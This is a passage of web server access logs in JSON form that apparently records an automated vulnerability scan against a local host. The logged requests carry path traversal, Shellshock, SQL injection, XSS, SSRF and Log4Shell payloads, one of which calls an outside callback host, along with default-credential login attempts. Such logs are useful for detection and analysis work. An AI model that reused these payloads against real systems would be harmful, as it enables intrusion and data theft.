+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/39 HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"username=admin&password=geoserver","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /geoserver/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?host=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pem/login/pages/login.jsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?file=http://0177.0.0.1/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"c\x02\x00H\x00\x04","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mifs/.;/services/LogService HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"https://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /administrator/manifests/files/joomla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /%u002e/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00/WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wps/PA_WCM_Authoring_UI/proxy/http/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/jarrewrite.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"\x22() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'\x22", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"username=admin&password=ixcache","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.188","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Items/RemoteSearch/Image?ProviderName=TheMovieDB&ImageURL=http://notburpcollaborator.net HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logon.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /go/auth/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"username=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.lz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v3/settings/first-login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pme/database/pme/phinx.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/contentfinder/connector/suggestions.json;%0aOJh.css?query_term=path%3a/&pre=297Mksq5F0inmxv3RrjmTiHl1wf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.rar HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/web.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET .//WEB-INF/weblogic.xml HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.gz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"{\x22username\x22:\x22${jndi:ldap://${hostName}.c9v8ia8smpv8c8qg07h0nykidockp85zf.oast.me}\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /suite-api/api/auth/token/acquire HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/ui/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"html_element_selection=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fmlurlsvc/?=&url=https%3A%2F%2Fgoogle.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) 